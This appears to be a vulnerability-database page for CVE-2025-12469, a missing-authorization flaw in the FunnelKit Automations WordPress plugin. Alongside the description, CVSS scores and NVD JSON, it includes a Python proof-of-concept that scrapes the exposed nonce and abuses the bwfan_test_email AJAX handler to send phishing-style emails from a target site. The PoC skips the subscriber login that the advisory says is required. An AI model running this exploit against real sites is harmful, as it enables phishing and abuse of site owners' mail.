Security Vulnerability Report
δΈ­ζ–‡
CVE-2025-12469 CVSS 4.3 MEDIUM

CVE-2025-12469

Published: 2025-11-05 10:15:36
Last Modified: 2025-12-04 14:03:19
Source: [email protected]

Description

The FunnelKit Automations – Email Marketing Automation and CRM for WordPress & WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.6.4.1. This is due to the plugin not properly verifying that a user is authorized to perform administrative actions in the `bwfan_test_email` AJAX handler. The nonce used for verification is publicly exposed to all visitors (including unauthenticated users) via the frontend JavaScript localization, and the `check_nonce()` function accepts low-privilege authenticated users who possess this nonce. This makes it possible for authenticated attackers, with Subscriber-level access and above, to send arbitrary emails from the site with attacker-controlled subject and body content.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:funnelkit:funnelkit_automations:*:*:*:*:*:wordpress:*:* - VULNERABLE
FunnelKit Automations (wp-marketing-automations) <= 3.6.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import re from urllib.parse import urljoin # CVE-2025-12469 PoC - FunnelKit Automations Authorization Bypass # Target: WordPress site with FunnelKit Automations plugin <= 3.6.4.1 def get_nonce(target_url): """Extract public nonce from frontend JavaScript localization""" response = requests.get(target_url, timeout=30) # Search for nonce in wp_localize_script data patterns = [ r'bwfan_test_email.*?"([a-f0-9]{10})",\s*"bwfan_test_email"', r'"bwfan_nonce"\s*:\s*"([a-f0-9]+)"', r'ajaxurl.*?nonce.*?([a-f0-9]{10,})' ] for pattern in patterns: match = re.search(pattern, response.text) if match: return match.group(1) return None def exploit(target_url, attacker_email): """Send arbitrary emails via vulnerable endpoint""" nonce = get_nonce(target_url) if not nonce: print('[-] Failed to obtain nonce') return False print(f'[+] Nonce obtained: {nonce}') # Vulnerable AJAX endpoint ajax_url = urljoin(target_url, '/wp-admin/admin-ajax.php') # Malicious email payload data = { 'action': 'bwfan_test_email', '_bwfan_nonce': nonce, 'email_to': attacker_email, 'email_subject': 'Urgent: Account Security Alert', 'email_body': 'Phishing content...', 'email_heading': 'Security Team' } response = requests.post(ajax_url, data=data, timeout=30) if response.status_code == 200 and 'success' in response.text.lower(): print('[+] Email sent successfully!') return True else: print('[-] Exploitation failed') return False if __name__ == '__main__': import sys if len(sys.argv) < 3: print(f'Usage: python {sys.argv[0]} <target_url> <attacker_email>') sys.exit(1) exploit(sys.argv[1], sys.argv[2])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12469", "sourceIdentifier": "[email protected]", "published": "2025-11-05T10:15:35.933", "lastModified": "2025-12-04T14:03:18.960", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The FunnelKit Automations – Email Marketing Automation and CRM for WordPress & WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.6.4.1. This is due to the plugin not properly verifying that a user is authorized to perform administrative actions in the `bwfan_test_email` AJAX handler. The nonce used for verification is publicly exposed to all visitors (including unauthenticated users) via the frontend JavaScript localization, and the `check_nonce()` function accepts low-privilege authenticated users who possess this nonce. This makes it possible for authenticated attackers, with Subscriber-level access and above, to send arbitrary emails from the site with attacker-controlled subject and body content."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:funnelkit:funnelkit_automations:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "3.6.4.2", "matchCriteriaId": "3034084D-172A-4FE5-9A23-F7B4F45F4787"}]}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-marketing-automations/trunk/includes/abstracts/class-bwfan-ajax-controller.php#L296", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/browser/wp-marketing-automations/trunk/includes/class-bwfan-common.php#L1896", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/browser/wp-marketing-automations/trunk/includes/class-bwfan-public.php#L70", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/changeset/3388822/wp-marketing-automations/trunk/includes/abstracts/class-bwfan-ajax-controller.php", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/72198b74-90f6-49c6-b261-6f9c1cdc9692?source=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.